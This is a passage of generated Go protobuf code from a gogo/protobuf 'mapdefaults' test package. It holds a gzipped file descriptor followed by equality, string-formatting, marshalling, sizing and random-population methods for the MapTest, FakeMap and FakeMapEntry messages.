0x41, 0x26, 0x6d, 0x2c, 0x77, 0x6d, 0xd5, 0x24, 0x21, 0xc0, 0xe4, 0xb8, 0x8d, 0xd7, 0xd5, 0x40,
0x6a, 0x9b, 0x5c, 0x3f, 0xac, 0x7e, 0x1f, 0x99, 0x9e, 0xcb, 0xd7, 0x95, 0xc9, 0xab, 0x4c, 0x2c,
0x3d, 0x03, 0x8b, 0x9e, 0xa3, 0xea, 0x46, 0x48, 0x37, 0x41, 0x74, 0x45, 0xde, 0xe1, 0x2b, 0x97,
0xe1, 0x2c, 0xe7, 0x6d, 0x23, 0x4f, 0xd5, 0x7a, 0xa8, 0x3d, 0x04, 0xcd, 0x92, 0x17, 0xd8, 0x33,
0x4c, 0x61, 0x93, 0xf5, 0x73, 0x6c, 0xf1, 0x7b, 0x02, 0x2c, 0xf2, 0x0b, 0x53, 0xdb, 0x77, 0xd6,
0x0e, 0x80, 0x6a, 0x9a, 0x96, 0x17, 0x74, 0xd7, 0x78, 0x28, 0x8f, 0xe1, 0x4a, 0x15, 0x1f, 0x24,
0x07, 0x08, 0x56, 0xfa, 0x00, 0xc3, 0x9e, 0x63, 0xdd, 0x76, 0x0e, 0x32, 0xec, 0x17, 0x10, 0xf2,
0x33, 0x1a, 0xbd, 0x62, 0x03, 0x15, 0xe1, 0x9b, 0x95, 0xb4, 0x0c, 0xc9, 0x03, 0xd4, 0xd5, 0x4d,
0xf6, 0xae, 0x49, 0x1b, 0xfc, 0xad, 0x36, 0xe1, 0xbf, 0xd5, 0x6e, 0xdc, 0x84, 0x25, 0xcd, 0xea,
0x8f, 0x9a, 0xbb, 0x21, 0x8e, 0x5c, 0xf3, 0xdd, 0x4f, 0x0b, 0x9f, 0x83, 0x61, 0x89, 0xf9, 0x95,
0x58, 0x7c, 0xab, 0xb9, 0xf1, 0xb5, 0xd8, 0xca, 0x16, 0xc5, 0x35, 0xf9, 0x34, 0x65, 0xd4, 0x31,
0x90, 0x86, 0x4d, 0x87, 0x1f, 0x3c, 0x01, 0x9f, 0xe8, 0xea, 0x5e, 0x6f, 0x70, 0x50, 0xd2, 0xac,
0xfe, 0x7a, 0xd7, 0xea, 0x5a, 0xc3, 0x9f, 0x0d, 0x71, 0x8b, 0x34, 0xc8, 0x7f, 0xec, 0xa7, 0xc3,
0xb4, 0x2f, 0x5d, 0x89, 0xfc, 0x9d, 0xb1, 0xbc, 0x0b, 0x4b, 0x4c, 0x59, 0x21, 0xbf, 0x5d, 0xd0,
0x2b, 0x84, 0xf4, 0xd0, 0xf7, 0x9f, 0xfc, 0x37, 0xde, 0x21, 0xb9, 0x5a, 0x5e, 0x64, 0x50, 0xdc,
0x47, 0x6f, 0x19, 0x65, 0x19, 0x4e, 0x85, 0xf8, 0xe8, 0xbe, 0x44, 0x4e, 0x04, 0xe3, 0x77, 0x18,
0xe3, 0x52, 0x80, 0xb1, 0xc5, 0xa0, 0xe5, 0x2a, 0xcc, 0x9f, 0x84, 0xeb, 0x1f, 0x18, 0x57, 0x16,
0x05, 0x49, 0xb6, 0x60, 0x81, 0x90, 0x68, 0x03, 0xd7, 0xb3, 0xfa, 0xe4, 0xd0, 0x7b, 0x38, 0xcd,
0x3f, 0xbe, 0x43, 0x37, 0x4a, 0x0e, 0xc3, 0xaa, 0x3e, 0xaa, 0x5c, 0x06, 0xf2, 0x73, 0x4d, 0x1b,
0x69, 0x46, 0x04, 0xc3, 0x5b, 0xcc, 0x10, 0x5f, 0xbf, 0xfc, 0x59, 0x58, 0xc6, 0xff, 0x93, 0x33,
0x29, 0x68, 0x49, 0xf4, 0x6b, 0x57, 0xfe, 0x7b, 0xaf, 0xd0, 0xbd, 0xb8, 0xe4, 0x13, 0x04, 0x6c,
0x0a, 0xac, 0x62, 0x17, 0x79, 0x1e, 0x72, 0x5c, 0x45, 0x35, 0x26, 0x99, 0x17, 0x78, 0x2e, 0xc8,
0x7f, 0xe9, 0xdd, 0xf0, 0x2a, 0x6e, 0x51, 0x64, 0xc5, 0x30, 0xca, 0xfb, 0x70, 0x66, 0x42, 0x54,
0x4c, 0xc1, 0xf9, 0x2a, 0xe3, 0x5c, 0x1e, 0x8b, 0x0c, 0x4c, 0xdb, 0x04, 0x2e, 0xf7, 0xd7, 0x72,
0x0a, 0xce, 0xdf, 0x63, 0x9c, 0x12, 0xc3, 0xf2, 0x25, 0xc5, 0x8c, 0x37, 0x60, 0xf1, 0x0e, 0x72,
0x0e, 0x2c, 0x97, 0x3d, 0xd1, 0x4c, 0x41, 0xf7, 0x1a, 0xa3, 0x5b, 0x60, 0x40, 0xf2, 0x66, 0x83,
0xb9, 0xae, 0x42, 0xaa, 0xa3, 0x6a, 0x68, 0x0a, 0x8a, 0x2f, 0x33, 0x8a, 0x39, 0xac, 0x8f, 0xa1,
0x15, 0xc8, 0x76, 0x2d, 0x96, 0x96, 0xa2, 0xe1, 0xaf, 0x33, 0x78, 0x86, 0x63, 0x18, 0x85, 0x6d,
0xd9, 0x03, 0x03, 0xe7, 0xac, 0x68, 0x8a, 0xdf, 0xe7, 0x14, 0x1c, 0xc3, 0x28, 0x4e, 0xe0, 0xd6,
0x3f, 0xe0, 0x14, 0x6e, 0xc0, 0x9f, 0x2f, 0x40, 0xc6, 0x32, 0x8d, 0x43, 0xcb, 0x9c, 0xc6, 0x88,
0x3f, 0x64, 0x0c, 0xc0, 0x20, 0x98, 0xe0, 0x1a, 0xa4, 0xa7, 0x5d, 0x88, 0x3f, 0x7a, 0x97, 0x6f,
0x0f, 0xbe, 0x02, 0x5b, 0xb0, 0xc0, 0x0f, 0x28, 0xdd, 0x32, 0xa7, 0xa0, 0xf8, 0x63, 0x46, 0x91,
0x0b, 0xc0, 0xd8, 0x34, 0x3c, 0xe4, 0x7a, 0x5d, 0x34, 0x0d, 0xc9, 0x1b, 0x7c, 0x1a, 0x0c, 0xc2,
0x5c, 0x79, 0x80, 0x4c, 0xad, 0x37, 0x1d, 0xc3, 0x57, 0xb9, 0x2b, 0x39, 0x06, 0x53, 0x54, 0x61,
0xbe, 0xaf, 0x3a, 0x6e, 0x4f, 0x35, 0xa6, 0x5a, 0x8e, 0x3f, 0x61, 0x1c, 0x59, 0x1f, 0xc4, 0x3c,
0x32, 0x30, 0x4f, 0x42, 0xf3, 0x35, 0xee, 0x91, 0x00, 0x8c, 0x6d, 0x3d, 0xd7, 0x23, 0xef, 0x59,
0x27, 0x61, 0xfb, 0x3a, 0xdf, 0x7a, 0x14, 0xbb, 0x13, 0x64, 0xbc, 0x06, 0x69, 0x57, 0xbf, 0x37,
0x15, 0xcd, 0x9f, 0xf2, 0x95, 0x26, 0x00, 0x0c, 0x7e, 0x09, 0xce, 0x4e, 0x4c, 0x13, 0x53, 0x90,
0xfd, 0x19, 0x23, 0x3b, 0x3d, 0x21, 0x55, 0xb0, 0x23, 0xe1, 0xa4, 0x94, 0x7f, 0xce, 0x8f, 0x04,
0x34, 0xc2, 0xd5, 0xc4, 0x17, 0x05, 0x57, 0xed, 0x9c, 0xcc, 0x6b, 0x7f, 0xc1, 0xbd, 0x46, 0xb1,
0x21, 0xaf, 0xed, 0xc1, 0x69, 0xc6, 0x78, 0xb2, 0x75, 0x7d, 0x93, 0x1f, 0xac, 0x14, 0xbd, 0x1f,
0x5e, 0xdd, 0x9f, 0x81, 0x15, 0xdf, 0x9d, 0xbc, 0x22, 0x75, 0x95, 0xbe, 0x6a, 0x4f, 0xc1, 0xfc,
0x0d, 0xc6, 0xcc, 0x4f, 0x7c, 0xbf, 0xa4, 0x75, 0x77, 0x54, 0x1b, 0x93, 0xdf, 0x84, 0x3c, 0x27,
0x1f, 0x98, 0x0e, 0xd2, 0xac, 0xae, 0xa9, 0xdf, 0x43, 0xed, 0x29, 0xa8, 0xff, 0x72, 0x64, 0xa9,
0xf6, 0x03, 0x70, 0xcc, 0x5c, 0x07, 0xd1, 0xaf, 0x55, 0x14, 0xbd, 0x6f, 0x5b, 0x8e, 0x17, 0xc1,
0xf8, 0x4d, 0xbe, 0x52, 0x3e, 0xae, 0x4e, 0x60, 0xe5, 0x1a, 0xe4, 0x48, 0x73, 0xda, 0x90, 0xfc,
0x2b, 0x46, 0x34, 0x3f, 0x44, 0xb1, 0x83, 0x43, 0xb3, 0xfa, 0xb6, 0xea, 0x4c, 0x73, 0xfe, 0xfd,
0x35, 0x3f, 0x38, 0x18, 0x84, 0x1d, 0x1c, 0xde, 0xa1, 0x8d, 0x70, 0xb6, 0x9f, 0x82, 0xe1, 0x5b,
0xfc, 0xe0, 0xe0, 0x18, 0x46, 0xc1, 0x0b, 0x86, 0x29, 0x28, 0xfe, 0x86, 0x53, 0x70, 0x0c, 0xa6,
0xf8, 0xcc, 0x30, 0xd1, 0x3a, 0xa8, 0xab, 0xbb, 0x9e, 0x43, 0xeb, 0xe0, 0x87, 0x53, 0x7d, 0xfb,
0xdd, 0x70, 0x11, 0x26, 0x07, 0xa0, 0xe5, 0x1b, 0xb0, 0x30, 0x52, 0x62, 0x48, 0x51, 0xdf, 0x7e,
0xe4, 0x7f, 0xfe, 0x7d, 0x76, 0x18, 0x85, 0x2b, 0x8c, 0xf2, 0x36, 0x5e, 0xf7, 0x70, 0x1d, 0x10,
0x4d, 0xf6, 0xca, 0xfb, 0xfe, 0xd2, 0x87, 0xca, 0x80, 0xf2, 0x75, 0x98, 0x0f, 0xd5, 0x00, 0xd1,
0x54, 0xbf, 0xc0, 0xa8, 0xb2, 0xc1, 0x12, 0xa0, 0x7c, 0x09, 0x12, 0x38, 0x9f, 0x47, 0xc3, 0x7f,
0x91, 0xc1, 0x89, 0x7a, 0xf9, 0x53, 0x90, 0xe2, 0x79, 0x3c, 0x1a, 0xfa, 0x4b, 0x0c, 0xea, 0x43,
0x30, 0x9c, 0xe7, 0xf0, 0x68, 0xf8, 0x2f, 0x73, 0x38, 0x87, 0x60, 0xf8, 0xf4, 0x2e, 0xfc, 0xfb,
0x5f, 0x49, 0xb0, 0x73, 0x98, 0xfb, 0xee, 0x1a, 0xcc, 0xb1, 0xe4, 0x1d, 0x8d, 0xfe, 0x02, 0x1b,
0x9c, 0x23, 0xca, 0xcf, 0x41, 0x72, 0x4a, 0x87, 0xff, 0x2a, 0x83, 0x52, 0xfd, 0x72, 0x15, 0x32,
0x81, 0x84, 0x1d, 0x0d, 0xff, 0x35, 0x06, 0x0f, 0xa2, 0xb0, 0xe9, 0x2c, 0x61, 0x47, 0x13, 0xfc,
0x3a, 0x37, 0x9d, 0x21, 0xb0, 0xdb, 0x78, 0xae, 0x8e, 0x46, 0xff, 0x06, 0xf7, 0x3a, 0x87, 0x94,
0x5f, 0x80, 0xb4, 0x7f, 0xfe, 0x46, 0xe3, 0x7f, 0x93, 0xe1, 0x87, 0x18, 0xec, 0x81, 0xc0, 0xf9,
0x1f, 0x4d, 0xf1, 0x5b, 0xdc, 0x03, 0x01, 0x14, 0xde, 0x46, 0xa3, 0x39, 0x3d, 0x9a, 0xe9, 0xb7,
0xf9, 0x36, 0x1a, 0x49, 0xe9, 0x78, 0x35, 0xc9, 0x31, 0x18, 0x4d, 0xf1, 0x3b, 0x7c, 0x35, 0x89,
0x3e, 0x36, 0x63, 0x34, 0x49, 0x46, 0x73, 0xfc, 0x2e, 0x37, 0x63, 0x24, 0x47, 0x96, 0x9b, 0x20,
0x8d, 0x27, 0xc8, 0x68, 0xbe, 0x2f, 0x32, 0xbe, 0xc5, 0xb1, 0xfc, 0x58, 0x7e, 0x11, 0x4e, 0x4f,
0x4e, 0x8e, 0xd1, 0xac, 0x5f, 0x7a, 0x7f, 0xe4, 0x3a, 0x13, 0xcc, 0x8d, 0xe5, 0xbd, 0xe1, 0x29,
0x1b, 0x4c, 0x8c, 0xd1, 0xb4, 0xaf, 0xbe, 0x1f, 0x3e, 0x68, 0x83, 0x79, 0xb1, 0x5c, 0x01, 0x18,
0xe6, 0xa4, 0x68, 0xae, 0xd7, 0x18, 0x57, 0x00, 0x84, 0xb7, 0x06, 0x4b, 0x49, 0xd1, 0xf8, 0x2f,
0xf3, 0xad, 0xc1, 0x10, 0x78, 0x6b, 0xf0, 0x6c, 0x14, 0x8d, 0x7e, 0x9d, 0x6f, 0x0d, 0x0e, 0x29,
0x5f, 0x83, 0x94, 0x39, 0x30, 0x0c, 0x1c, 0x5b, 0xd2, 0xc3, 0x3f, 0x67, 0xca, 0xff, 0xfb, 0x07,
0x0c, 0xcc, 0x01, 0xe5, 0x4b, 0x90, 0x44, 0xfd, 0x03, 0xd4, 0x8e, 0x42, 0xfe, 0xc7, 0x07, 0xfc,
0x3c, 0xc1, 0xda, 0xe5, 0x17, 0x00, 0xe8, 0x65, 0x9a, 0xfc, 0x4a, 0x14, 0x81, 0xfd, 0xcf, 0x0f,
0xd8, 0x97, 0x12, 0x43, 0xc8, 0x90, 0x80, 0x7e, 0x77, 0xf1, 0x70, 0x82, 0x77, 0xc3, 0x04, 0xe4,
0x02, 0x7e, 0x15, 0xe6, 0x6e, 0xb9, 0x96, 0xe9, 0xa9, 0xdd, 0x28, 0xf4, 0x7f, 0x31, 0x34, 0xd7,
0xc7, 0x0e, 0xeb, 0x5b, 0x0e, 0xf2, 0xd4, 0xae, 0x1b, 0x85, 0xfd, 0x6f, 0x86, 0xf5, 0x01, 0x18,
0xac, 0xa9, 0xae, 0x37, 0xcd, 0xbc, 0xff, 0x87, 0x83, 0x39, 0x00, 0x1b, 0x8d, 0xff, 0xbf, 0x8d,
0x0e, 0xa3, 0xb0, 0xef, 0x71, 0xa3, 0x99, 0x7e, 0xf9, 0x53, 0x90, 0xc6, 0xff, 0xd2, 0xaf, 0x87,
0x22, 0xc0, 0xff, 0xcb, 0xc0, 0x43, 0x04, 0x1e, 0xd9, 0xf5, 0xda, 0x9e, 0x1e, 0xed, 0xec, 0xff,
0x63, 0x2b, 0xcd, 0xf5, 0xcb, 0x15, 0xc8, 0xb8, 0x5e, 0xbb, 0x3d, 0x60, 0x15, 0x4d, 0x04, 0xfc,
0x07, 0x1f, 0xf8, 0x97, 0x5c, 0x1f, 0xb3, 0x71, 0x7e, 0xf2, 0x63, 0x1d, 0x6c, 0x59, 0x5b, 0x16,
0x7d, 0xa6, 0x83, 0x37, 0xe3, 0x70, 0x4a, 0xb3, 0xfa, 0x07, 0x96, 0xbb, 0x7e, 0x60, 0x79, 0xbd,
0xf5, 0xbe, 0x6a, 0xb3, 0xd7, 0xb5, 0x4c, 0x5f, 0xb5, 0xd9, 0x27, 0x80, 0xee, 0xca, 0xc9, 0x5e,
0xe6, 0x8a, 0x3f, 0x07, 0x73, 0x3b, 0xaa, 0xbd, 0x87, 0x5c, 0x4f, 0x22, 0x1e, 0x20, 0x1f, 0xcb,
0xb0, 0xb7, 0xce, 0xd5, 0x52, 0x80, 0xb8, 0xc4, 0xd4, 0x4a, 0x2d, 0xcf, 0x69, 0x79, 0x0e, 0xf9,
0x5d, 0x58, 0x9e, 0x75, 0x49, 0x63, 0xe5, 0x2a, 0x64, 0x02, 0x62, 0x49, 0x84, 0xf8, 0x6d, 0x74,
0xc8, 0x3e, 0x97, 0xc1, 0xff, 0x4a, 0xcb, 0xc3, 0xcf, 0xc1, 0xb0, 0x8c, 0x36, 0xca, 0xb1, 0x2b,
0x42, 0xf1, 0x79, 0x98, 0xbb, 0xae, 0xde, 0x46, 0x3b, 0xaa, 0x2d, 0x5d, 0x84, 0x39, 0x64, 0x7a,
0x8e, 0x8e, 0x5c, 0x66, 0xc0, 0xd9, 0x90, 0x01, 0x4c, 0x8d, 0x8e, 0xcc, 0x35, 0x8b, 0xdb, 0x90,
0x0d, 0x76, 0x4c, 0x3b, 0x36, 0x96, 0x5a, 0x5e, 0x8f, 0x7d, 0x1e, 0x9a, 0x96, 0x69, 0x63, 0x63,
0xf3, 0xad, 0x07, 0x85, 0x99, 0xef, 0x3e, 0x28, 0xcc, 0xfc, 0xf3, 0x83, 0xc2, 0xcc, 0xdb, 0x0f,
0x0a, 0xc2, 0x7b, 0x0f, 0x0a, 0xc2, 0x0f, 0x1f, 0x14, 0x84, 0xfb, 0x47, 0x05, 0xe1, 0xab, 0x47,
0x05, 0xe1, 0xcd, 0xa3, 0x82, 0xf0, 0xed, 0xa3, 0x82, 0xf0, 0xd6, 0x51, 0x41, 0xf8, 0xee, 0x51,
0x41, 0x78, 0xfb, 0xa8, 0x20, 0x7c, 0xff, 0xa8, 0x30, 0xf3, 0xde, 0x51, 0x41, 0xf8, 0xe1, 0x51,
0x61, 0xe6, 0xfe, 0xbf, 0x16, 0x66, 0x0e, 0x66, 0x89, 0x6f, 0x2f, 0xfe, 0x7f, 0x00, 0x00, 0x00,
0xff, 0xff, 0x13, 0x16, 0x92, 0xfd, 0x57, 0x31, 0x00, 0x00,
}
r := bytes.NewReader(gzipped)
gzipr, err := compress_gzip.NewReader(r)
if err != nil {
panic(err)
}
ungzipped, err := io_ioutil.ReadAll(gzipr)
if err != nil {
panic(err)
}
if err := github_com_gogo_protobuf_proto.Unmarshal(ungzipped, d); err != nil {
panic(err)
}
return d
}
func (this *MapTest) VerboseEqual(that interface{}) error {
if that == nil {
if this == nil {
return nil
}
return fmt.Errorf("that == nil && this != nil")
}
that1, ok := that.(*MapTest)
if !ok {
that2, ok := that.(MapTest)
if ok {
that1 = &that2
} else {
return fmt.Errorf("that is not of type *MapTest")
}
}
if that1 == nil {
if this == nil {
return nil
}
return fmt.Errorf("that is type *MapTest but is nil && this != nil")
} else if this == nil {
return fmt.Errorf("that is type *MapTest but is not nil && this == nil")
}
if len(this.StrStr) != len(that1.StrStr) {
return fmt.Errorf("StrStr this(%v) Not Equal that(%v)", len(this.StrStr), len(that1.StrStr))
}
for i := range this.StrStr {
if this.StrStr[i] != that1.StrStr[i] {
return fmt.Errorf("StrStr this[%v](%v) Not Equal that[%v](%v)", i, this.StrStr[i], i, that1.StrStr[i])
}
}
return nil
}
func (this *MapTest) Equal(that interface{}) bool {
if that == nil {
if this == nil {
return true
}
return false
}
that1, ok := that.(*MapTest)
if !ok {
that2, ok := that.(MapTest)
if ok {
that1 = &that2
} else {
return false
}
}
if that1 == nil {
if this == nil {
return true
}
return false
} else if this == nil {
return false
}
if len(this.StrStr) != len(that1.StrStr) {
return false
}
for i := range this.StrStr {
if this.StrStr[i] != that1.StrStr[i] {
return false
}
}
return true
}
func (this *FakeMap) VerboseEqual(that interface{}) error {
if that == nil {
if this == nil {
return nil
}
return fmt.Errorf("that == nil && this != nil")
}
that1, ok := that.(*FakeMap)
if !ok {
that2, ok := that.(FakeMap)
if ok {
that1 = &that2
} else {
return fmt.Errorf("that is not of type *FakeMap")
}
}
if that1 == nil {
if this == nil {
return nil
}
return fmt.Errorf("that is type *FakeMap but is nil && this != nil")
} else if this == nil {
return fmt.Errorf("that is type *FakeMap but is not nil && this == nil")
}
if len(this.Entries) != len(that1.Entries) {
return fmt.Errorf("Entries this(%v) Not Equal that(%v)", len(this.Entries), len(that1.Entries))
}
for i := range this.Entries {
if !this.Entries[i].Equal(that1.Entries[i]) {
return fmt.Errorf("Entries this[%v](%v) Not Equal that[%v](%v)", i, this.Entries[i], i, that1.Entries[i])
}
}
return nil
}
func (this *FakeMap) Equal(that interface{}) bool {
if that == nil {
if this == nil {
return true
}
return false
}
that1, ok := that.(*FakeMap)
if !ok {
that2, ok := that.(FakeMap)
if ok {
that1 = &that2
} else {
return false
}
}
if that1 == nil {
if this == nil {
return true
}
return false
} else if this == nil {
return false
}
if len(this.Entries) != len(that1.Entries) {
return false
}
for i := range this.Entries {
if !this.Entries[i].Equal(that1.Entries[i]) {
return false
}
}
return true
}
func (this *FakeMapEntry) VerboseEqual(that interface{}) error {
if that == nil {
if this == nil {
return nil
}
return fmt.Errorf("that == nil && this != nil")
}
that1, ok := that.(*FakeMapEntry)
if !ok {
that2, ok := that.(FakeMapEntry)
if ok {
that1 = &that2
} else {
return fmt.Errorf("that is not of type *FakeMapEntry")
}
}
if that1 == nil {
if this == nil {
return nil
}
return fmt.Errorf("that is type *FakeMapEntry but is nil && this != nil")
} else if this == nil {
return fmt.Errorf("that is type *FakeMapEntry but is not nil && this == nil")
}
if this.Key != that1.Key {
return fmt.Errorf("Key this(%v) Not Equal that(%v)", this.Key, that1.Key)
}
if this.Value != that1.Value {
return fmt.Errorf("Value this(%v) Not Equal that(%v)", this.Value, that1.Value)
}
if this.Other != that1.Other {
return fmt.Errorf("Other this(%v) Not Equal that(%v)", this.Other, that1.Other)
}
return nil
}
func (this *FakeMapEntry) Equal(that interface{}) bool {
if that == nil {
if this == nil {
return true
}
return false
}
that1, ok := that.(*FakeMapEntry)
if !ok {
that2, ok := that.(FakeMapEntry)
if ok {
that1 = &that2
} else {
return false
}
}
if that1 == nil {
if this == nil {
return true
}
return false
} else if this == nil {
return false
}
if this.Key != that1.Key {
return false
}
if this.Value != that1.Value {
return false
}
if this.Other != that1.Other {
return false
}
return true
}
func (this *MapTest) GoString() string {
if this == nil {
return "nil"
}
s := make([]string, 0, 5)
s = append(s, "&mapdefaults.MapTest{")
keysForStrStr := make([]string, 0, len(this.StrStr))
for k := range this.StrStr {
keysForStrStr = append(keysForStrStr, k)
}
github_com_gogo_protobuf_sortkeys.Strings(keysForStrStr)
mapStringForStrStr := "map[string]string{"
for _, k := range keysForStrStr {
mapStringForStrStr += fmt.Sprintf("%#v: %#v,", k, this.StrStr[k])
}
mapStringForStrStr += "}"
if this.StrStr != nil {
s = append(s, "StrStr: "+mapStringForStrStr+",\n")
}
s = append(s, "}")
return strings.Join(s, "")
}
func (this *FakeMap) GoString() string {
if this == nil {
return "nil"
}
s := make([]string, 0, 5)
s = append(s, "&mapdefaults.FakeMap{")
if this.Entries != nil {
s = append(s, "Entries: "+fmt.Sprintf("%#v", this.Entries)+",\n")
}
s = append(s, "}")
return strings.Join(s, "")
}
func (this *FakeMapEntry) GoString() string {
if this == nil {
return "nil"
}
s := make([]string, 0, 7)
s = append(s, "&mapdefaults.FakeMapEntry{")
s = append(s, "Key: "+fmt.Sprintf("%#v", this.Key)+",\n")
s = append(s, "Value: "+fmt.Sprintf("%#v", this.Value)+",\n")
s = append(s, "Other: "+fmt.Sprintf("%#v", this.Other)+",\n")
s = append(s, "}")
return strings.Join(s, "")
}
func valueToGoStringMap(v interface{}, typ string) string {
rv := reflect.ValueOf(v)
if rv.IsNil() {
return "nil"
}
pv := reflect.Indirect(rv).Interface()
return fmt.Sprintf("func(v %v) *%v { return &v } ( %#v )", typ, typ, pv)
}
func (m *MapTest) Marshal() (dAtA []byte, err error) {
size := m.Size()
dAtA = make([]byte, size)
n, err := m.MarshalTo(dAtA)
if err != nil {
return nil, err
}
return dAtA[:n], nil
}
func (m *MapTest) MarshalTo(dAtA []byte) (int, error) {
var i int
_ = i
var l int
_ = l
if len(m.StrStr) > 0 {
for k := range m.StrStr {
dAtA[i] = 0xa
i++
v := m.StrStr[k]
mapSize := 1 + len(k) + sovMap(uint64(len(k))) + 1 + len(v) + sovMap(uint64(len(v)))
i = encodeVarintMap(dAtA, i, uint64(mapSize))
dAtA[i] = 0xa
i++
i = encodeVarintMap(dAtA, i, uint64(len(k)))
i += copy(dAtA[i:], k)
dAtA[i] = 0x12
i++
i = encodeVarintMap(dAtA, i, uint64(len(v)))
i += copy(dAtA[i:], v)
}
}
return i, nil
}
func (m *FakeMap) Marshal() (dAtA []byte, err error) {
size := m.Size()
dAtA = make([]byte, size)
n, err := m.MarshalTo(dAtA)
if err != nil {
return nil, err
}
return dAtA[:n], nil
}
func (m *FakeMap) MarshalTo(dAtA []byte) (int, error) {
var i int
_ = i
var l int
_ = l
if len(m.Entries) > 0 {
for _, msg := range m.Entries {
dAtA[i] = 0xa
i++
i = encodeVarintMap(dAtA, i, uint64(msg.Size()))
n, err := msg.MarshalTo(dAtA[i:])
if err != nil {
return 0, err
}
i += n
}
}
return i, nil
}
func (m *FakeMapEntry) Marshal() (dAtA []byte, err error) {
size := m.Size()
dAtA = make([]byte, size)
n, err := m.MarshalTo(dAtA)
if err != nil {
return nil, err
}
return dAtA[:n], nil
}
func (m *FakeMapEntry) MarshalTo(dAtA []byte) (int, error) {
var i int
_ = i
var l int
_ = l
if len(m.Key) > 0 {
dAtA[i] = 0xa
i++
i = encodeVarintMap(dAtA, i, uint64(len(m.Key)))
i += copy(dAtA[i:], m.Key)
}
if len(m.Value) > 0 {
dAtA[i] = 0x12
i++
i = encodeVarintMap(dAtA, i, uint64(len(m.Value)))
i += copy(dAtA[i:], m.Value)
}
if len(m.Other) > 0 {
dAtA[i] = 0x1a
i++
i = encodeVarintMap(dAtA, i, uint64(len(m.Other)))
i += copy(dAtA[i:], m.Other)
}
return i, nil
}
func encodeVarintMap(dAtA []byte, offset int, v uint64) int {
for v >= 1<<7 {
dAtA[offset] = uint8(v&0x7f | 0x80)
v >>= 7
offset++
}
dAtA[offset] = uint8(v)
return offset + 1
}
func NewPopulatedMapTest(r randyMap, easy bool) *MapTest {
this := &MapTest{}
if r.Intn(10) != 0 {
v1 := r.Intn(10)
this.StrStr = make(map[string]string)
for i := 0; i < v1; i++ {
this.StrStr[randStringMap(r)] = randStringMap(r)
}
}
if !easy && r.Intn(10) != 0 {
}
return this
}
func NewPopulatedFakeMap(r randyMap, easy bool) *FakeMap {
this := &FakeMap{}
if r.Intn(10) != 0 {
v2 := r.Intn(5)
this.Entries = make([]*FakeMapEntry, v2)
for i := 0; i < v2; i++ {
this.Entries[i] = NewPopulatedFakeMapEntry(r, easy)
}
}
if !easy && r.Intn(10) != 0 {
}
return this
}
func NewPopulatedFakeMapEntry(r randyMap, easy bool) *FakeMapEntry {
this := &FakeMapEntry{}
this.Key = string(randStringMap(r))
this.Value = string(randStringMap(r))
this.Other = string(randStringMap(r))
if !easy && r.Intn(10) != 0 {
}
return this
}
type randyMap interface {
Float32() float32
Float64() float64
Int63() int64
Int31() int32
Uint32() uint32
Intn(n int) int
}
func randUTF8RuneMap(r randyMap) rune {
ru := r.Intn(62)
if ru < 10 {
return rune(ru + 48)
} else if ru < 36 {
return rune(ru + 55)
}
return rune(ru + 61)
}
func randStringMap(r randyMap) string {
v3 := r.Intn(100)
tmps := make([]rune, v3)
for i := 0; i < v3; i++ {
tmps[i] = randUTF8RuneMap(r)
}
return string(tmps)
}
func randUnrecognizedMap(r randyMap, maxFieldNumber int) (dAtA []byte) {
l := r.Intn(5)
for i := 0; i < l; i++ {
wire := r.Intn(4)
if wire == 3 {
wire = 5
}
fieldNumber := maxFieldNumber + r.Intn(100)
dAtA = randFieldMap(dAtA, r, fieldNumber, wire)
}
return dAtA
}
func randFieldMap(dAtA []byte, r randyMap, fieldNumber int, wire int) []byte {
key := uint32(fieldNumber)<<3 | uint32(wire)
switch wire {
case 0:
dAtA = encodeVarintPopulateMap(dAtA, uint64(key))
v4 := r.Int63()
if r.Intn(2) == 0 {
v4 *= -1
}
dAtA = encodeVarintPopulateMap(dAtA, uint64(v4))
case 1:
dAtA = encodeVarintPopulateMap(dAtA, uint64(key))
dAtA = append(dAtA, byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)))
case 2:
dAtA = encodeVarintPopulateMap(dAtA, uint64(key))
ll := r.Intn(100)
dAtA = encodeVarintPopulateMap(dAtA, uint64(ll))
for j := 0; j < ll; j++ {
dAtA = append(dAtA, byte(r.Intn(256)))
}
default:
dAtA = encodeVarintPopulateMap(dAtA, uint64(key))
dAtA = append(dAtA, byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)))
}
return dAtA
}
func encodeVarintPopulateMap(dAtA []byte, v uint64) []byte {
for v >= 1<<7 {
dAtA = append(dAtA, uint8(uint64(v)&0x7f|0x80))
v >>= 7
}
dAtA = append(dAtA, uint8(v))
return dAtA
}
func (m *MapTest) Size() (n int) {
var l int
_ = l
if len(m.StrStr) > 0 {
for k, v := range m.StrStr {
_ = k
_ = v
mapEntrySize := 1 + len(k) + sovMap(uint64(len(k))) + 1 + len(v) + sovMap(uint64(len(v)))
n += mapEntrySize + 1 + sovMap(uint64(mapEntrySize))
}
}
return n
}
func (m *FakeMap) Size() (n int) {
var l int
_ = l
if len(m.Entries) > 0 {
for _, e := range m.Entries {
l = e.Size()
n += 1 + l + sovMap(uint64(l))
}
}
return n
}
func (m *FakeMapEntry) Size() (n int) {
var l int
_ = l
l = len(m.Key)
if l > 0 {
n += 1 + l + sovMap(uint64(l))
}
l = len(m.Value)
if l > 0 {
n += 1 + l + sovMap(uint64(l))
}
l = len(m.Other)
if l > 0 {
n += 1 + l + sovMap(uint64(l))
}
return n
}
func sovMap(x uint64) (n int) {
for {
n++
x >>= 7
if x == 0 {
break
}
}
return n
}
func sozMap(x uint64) (n int) {
return sovMap(uint64((x << 1) ^ uint64((int64(x) >> 63))))
}
func (this *MapTest) String() string {
if this == nil {
return "nil"
}
keysForStrStr := make([]string, 0, len(this.StrStr))
for k := range this.StrStr {
keysForStrStr = append(keysForStrStr, k)
}
github_com_gogo_protobuf_sortkeys.Strings(keysForStrStr)
mapStringForStrStr := "map[string]string{"
for _, k := range keysForStrStr {
mapStringForStrStr += fmt.Sprintf("%v: %v,", k, this.StrStr[k])
}
mapStringForStrStr += "}"
s := strings.Join([]string{`&MapTest{`,
`StrStr:` + mapStringForStrStr + `,`,
`}`,
}, "")
return s
}
func (this *FakeMap) String() string {
if this == nil {
return "nil"
}
s := strings.Join([]string{`&FakeMap{`,
`Entries:` + strings.Replace(fmt.Sprintf("%v", this.Entries), "FakeMapEntry", "FakeMapEntry", 1) + `,`,
`}`,
}, "")
return s
}
func (this *FakeMapEntry) String() string {
if this == nil {
return "nil"
}
